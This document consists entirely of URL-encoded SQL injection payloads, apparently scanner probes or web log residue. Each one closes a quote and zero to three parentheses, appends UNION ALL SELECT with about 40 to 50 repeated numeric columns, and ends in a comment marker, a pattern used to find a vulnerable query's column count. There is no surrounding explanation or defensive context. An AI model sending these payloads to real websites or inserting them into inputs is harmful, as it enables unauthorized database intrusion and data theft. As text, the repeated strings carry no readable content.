-6180%22%29%20UNION%20ALL%20SELECT%209116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%23 -4173%22%29%29%20UNION%20ALL%20SELECT%202786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%23 -4967%22%29%29%20UNION%20ALL%20SELECT%208390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%23 -5767%22%29%29%20UNION%20ALL%20SELECT%203489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%2C3489%23 -4123%22%29%29%20UNION%20ALL%20SELECT%206265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%23 -4858%22%29%29%20UNION%20ALL%20SELECT%209786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%2C9786%23 -6003%22%29%29%20UNION%20ALL%20SELECT%203066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%23 -7962%22%29%29%20UNION%20ALL%20SELECT%205185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%23 -8201%22%29%29%20UNION%20ALL%20SELECT%208082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%2C8082%23 -8595%22%29%29%20UNION%20ALL%20SELECT%204352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%2C4352%23 -1636%22%29%29%20UNION%20ALL%20SELECT%203333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%23 -8063%22%29%29%29%20UNION%20ALL%20SELECT%208213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%2C8213%23 -4960%22%29%29%29%20UNION%20ALL%20SELECT%207957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%2C7957%23 -8158%22%29%29%29%20UNION%20ALL%20SELECT%206863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%2C6863%23 -5380%22%29%29%29%20UNION%20ALL%20SELECT%204685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%23 -6919%22%29%29%29%20UNION%20ALL%20SELECT%202374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%23 -7935%22%29%29%29%20UNION%20ALL%20SELECT%205706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%23 -4509%22%29%29%29%20UNION%20ALL%20SELECT%201756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%23 -4577%22%29%29%29%20UNION%20ALL%20SELECT%203863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%2C3863%23 -6607%22%29%29%29%20UNION%20ALL%20SELECT%206154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%23 -4028%22%29%29%29%20UNION%20ALL%20SELECT%202661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%2C2661%23 -9530%22%20UNION%20ALL%20SELECT%209661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%2C9661%23 -7463%22%20UNION%20ALL%20SELECT%209329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%2C9329%23 -1462%22%20UNION%20ALL%20SELECT%202745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%23 -8817%22%20UNION%20ALL%20SELECT%207395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%23 -7806%22%20UNION%20ALL%20SELECT%207865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%2C7865%23 -9132%22%20UNION%20ALL%20SELECT%208019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%2C8019%23 -2817%22%20UNION%20ALL%20SELECT%201662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%2C1662%23 -9600%22%20UNION%20ALL%20SELECT%206354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%23 -6537%22%20UNION%20ALL%20SELECT%207311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%23 -8979%22%20UNION%20ALL%20SELECT%205321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%23 -6622%22%29%20UNION%20ALL%20SELECT%203512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%2C3512%23 -5273%22%29%20UNION%20ALL%20SELECT%209406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%23 -2110%22%29%20UNION%20ALL%20SELECT%206061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%2C6061%23 -4148%22%29%20UNION%20ALL%20SELECT%203884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%2C3884%23 -6182%22%29%20UNION%20ALL%20SELECT%205759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%2C5759%23 -1447%22%29%20UNION%20ALL%20SELECT%205099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%2C5099%23 -3489%22%29%20UNION%20ALL%20SELECT%207375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%23 -7824%22%29%20UNION%20ALL%20SELECT%208466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%23 -9176%22%29%20UNION%20ALL%20SELECT%204659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%23 -7238%22%29%20UNION%20ALL%20SELECT%203368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%23 -2406%22%29%29%20UNION%20ALL%20SELECT%206491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%2C6491%23 -4527%22%29%29%20UNION%20ALL%20SELECT%202578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%23 -9448%22%29%29%20UNION%20ALL%20SELECT%207448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%23 -9913%22%29%29%20UNION%20ALL%20SELECT%208850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%23 -4252%22%29%29%20UNION%20ALL%20SELECT%208073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%23 -6338%22%29%29%20UNION%20ALL%20SELECT%206928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%23 -3098%22%29%29%20UNION%20ALL%20SELECT%205647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%23 -7561%22%29%29%20UNION%20ALL%20SELECT%201150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%2C1150%23 -5054%22%29%29%20UNION%20ALL%20SELECT%203107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%23 -8419%22%29%29%20UNION%20ALL%20SELECT%202369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%23 -5566%22%29%29%29%20UNION%20ALL%20SELECT%207781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%23 -4420%22%29%29%29%20UNION%20ALL%20SELECT%201433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%23 -3252%22%29%29%29%20UNION%20ALL%20SELECT%207160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%23 -5444%22%29%29%29%20UNION%20ALL%20SELECT%207542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%23 -7598%22%29%29%29%20UNION%20ALL%20SELECT%208308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%23 -5569%22%29%29%29%20UNION%20ALL%20SELECT%202269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%23 -5282%22%29%29%29%20UNION%20ALL%20SELECT%203757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%2C3757%23 -3013%22%29%29%29%20UNION%20ALL%20SELECT%204668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%23 